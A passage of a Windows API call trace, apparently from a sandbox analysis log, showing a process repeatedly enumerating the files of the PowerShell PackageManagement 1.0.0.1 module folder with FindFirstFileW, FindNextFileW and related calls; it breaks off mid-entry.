[0281.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.026] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.026] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.026] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0281.026] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0281.027] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0281.027] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0281.027] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0281.027] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0281.028] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0281.028] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0281.028] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0281.029] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0281.029] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0281.029] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0281.029] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.029] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.030] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.030] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0281.030] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0281.030] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0281.031] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0281.031] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0281.031] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0281.031] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0281.031] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0281.031] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0281.031] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0281.031] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0281.032] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.032] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0281.032] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c9b0 | out: lpFileInformation=0x653ef8c9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0281.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0281.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.033] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c630 | out: lpFindFileData=0x653ef8c630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.033] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.033] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0281.033] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0281.033] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0281.034] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0281.034] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0281.034] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0281.034] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0281.034] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0281.034] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0281.034] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | 